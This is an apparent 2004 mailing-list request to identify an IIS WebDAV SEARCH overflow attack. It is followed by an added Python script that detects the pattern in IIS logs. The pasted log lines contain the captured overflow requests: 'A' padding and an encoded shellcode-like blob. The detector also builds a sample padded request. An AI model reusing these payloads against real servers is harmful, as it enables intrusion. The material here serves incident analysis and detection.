Message-ID: <200404290634.AA205390158@transientimages.com>
From: root at transientimages.com (System Administrator)
Subject: Exploit Identification Request
Folks:
One of our external systems (W2k, fully patched all components:
sp4, sql sp4, mdac sp3, post hotfixes, etc.) is being hit by what
appears to be a buffer overflow of IIS: 4096 bytes cycling in
what appears to be an attempt to execute code. The probe starts by
obtaining an index.asp page, and then drops a "SEARCH / 411 210
42" before dropping the "AAAAA<n>" string.
I've checked the SEARCH unicode against google (nothing) and
k-otic's current exploits (nada) and dshield tables (nada).
Can anyone assist in identification of the exploit/overrun attempt?
Thanks,
Oliver
2004-04-28 21:12:38 x.x.88.247 GET /index.asp 200 0 189 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
2004-04-28 21:12:38 x.x.88.247 SEARCH / 411 210 42 - -
2004-04-28 21:12:45 x.x.88.247
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA???.??????????????????????????????????####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrfd
2004-04-28 21:12:51 217.185.88.247
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA???.??????????????????????????????????####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
2004-04-28 21:13:01 217.185.198.113 GET /index.asp 200 0 189 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
2004-04-28 21:13:04 217.185.198.113 SEARCH / 411 210 42 - -
2004-04-28 21:13:27 217.185.198.113
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA???.??????????????????????????????????####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
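The log excerpt above shows a recognisable two-step shape: a WebDAV SEARCH on "/" that IIS answers with 411 (Length Required), followed a few seconds later from the same client by a SEARCH whose URI is a long run of "A" bytes with binary junk appended. The script below is an added example, not part of Oliver's post, that parses IIS W3C-style log lines and flags exactly that sequence for a defender: a SEARCH with an oversized URI or a long run of one repeated byte, escalated when the same client sent a SEARCH that drew a 411 within the preceding two minutes. The field layout (date, time, client IP, method, URI, status, bytes, user agent, referer), the thresholds and the sample log lines are all constructed for the example.

```python
"""Flag padded WebDAV SEARCH requests in IIS W3C-style log lines.

Added example, not code from the original post. Assumed field layout:
date time c-ip cs-method cs-uri-stem sc-status sc-bytes cs-bytes cs(User-Agent) cs(Referer)
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

# Thresholds are assumptions chosen for this example, not values from the post.
LONG_URI = 1024                    # any URI longer than this is worth a look
PAD_RUN = 64                       # a run of one repeated byte this long looks like padding
WINDOW = timedelta(minutes=2)      # how long a 411 probe stays relevant for the same client

# Regex for "some character repeated PAD_RUN or more times in a row".
PAD_RE = re.compile(r"(.)\1{%d,}" % (PAD_RUN - 1))


@dataclass
class Entry:
    ts: datetime
    ip: str
    method: str
    uri: str
    status: Optional[int]


def parse_line(line: str) -> Optional[Entry]:
    """Parse one W3C-style line; return None for lines that do not fit the layout."""
    parts = line.split(" ")
    if len(parts) < 5:
        return None
    date, clock, ip, method, uri = parts[:5]
    try:
        ts = datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S")
    except ValueError:
        return None
    status = int(parts[5]) if len(parts) > 5 and parts[5].isdigit() else None
    return Entry(ts, ip, method, uri, status)


def uri_flags(uri: str) -> List[str]:
    """Return the reasons a URI looks like overflow padding rather than a path."""
    flags = []
    if len(uri) > LONG_URI:
        flags.append(f"uri_len={len(uri)}")
    if PAD_RE.search(uri):
        flags.append("repeated_byte_run")
    return flags


def analyze(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Walk the log in order and return (client_ip, method, flags) for suspicious SEARCHes."""
    alerts = []
    probes = defaultdict(list)     # client ip -> timestamps of SEARCH requests answered 411
    for raw in lines:
        e = parse_line(raw.strip())
        if e is None:
            continue
        # Step 1 of the pattern: a bare SEARCH that IIS rejects with 411 Length Required.
        if e.method == "SEARCH" and e.status == 411:
            probes[e.ip].append(e.ts)
        # Step 2: a SEARCH carrying a padded URI from the same client shortly afterwards.
        if e.method == "SEARCH":
            flags = uri_flags(e.uri)
            if flags:
                if any(timedelta(0) <= e.ts - t <= WINDOW for t in probes[e.ip]):
                    flags.append("preceded_by_411_probe")
                alerts.append((e.ip, e.method, flags))
    return alerts


# Constructed sample lines modelled on the shape of the post's log (RFC 5737 test addresses).
SAMPLE_LOG = [
    "2004-04-28 21:12:38 192.0.2.10 GET /index.asp 200 0 189 Mozilla/4.0+(compatible;+MSIE+5.5) -",
    "2004-04-28 21:12:38 192.0.2.10 SEARCH / 411 210 42 - -",
    "2004-04-28 21:12:45 192.0.2.10 SEARCH /" + "A" * 1200 + "rmomddddddisjhneg 400 0 1300 - -",
    # Ordinary WebDAV client doing a short SEARCH: must not alert.
    "2004-04-28 21:13:10 192.0.2.20 SEARCH /docs/ 207 512 300 Microsoft-WebDAV-MiniRedir -",
]

if __name__ == "__main__":
    for ip, method, flags in analyze(SAMPLE_LOG):
        print(ip, method, ", ".join(flags))
```

The correlation step is what separates this from a plain "long URI" rule: a single oversized SEARCH can be a broken client, but a 411-rejected SEARCH followed by a padded one from the same address is the sequence the post describes, so the alert carries both reasons and can be tuned separately.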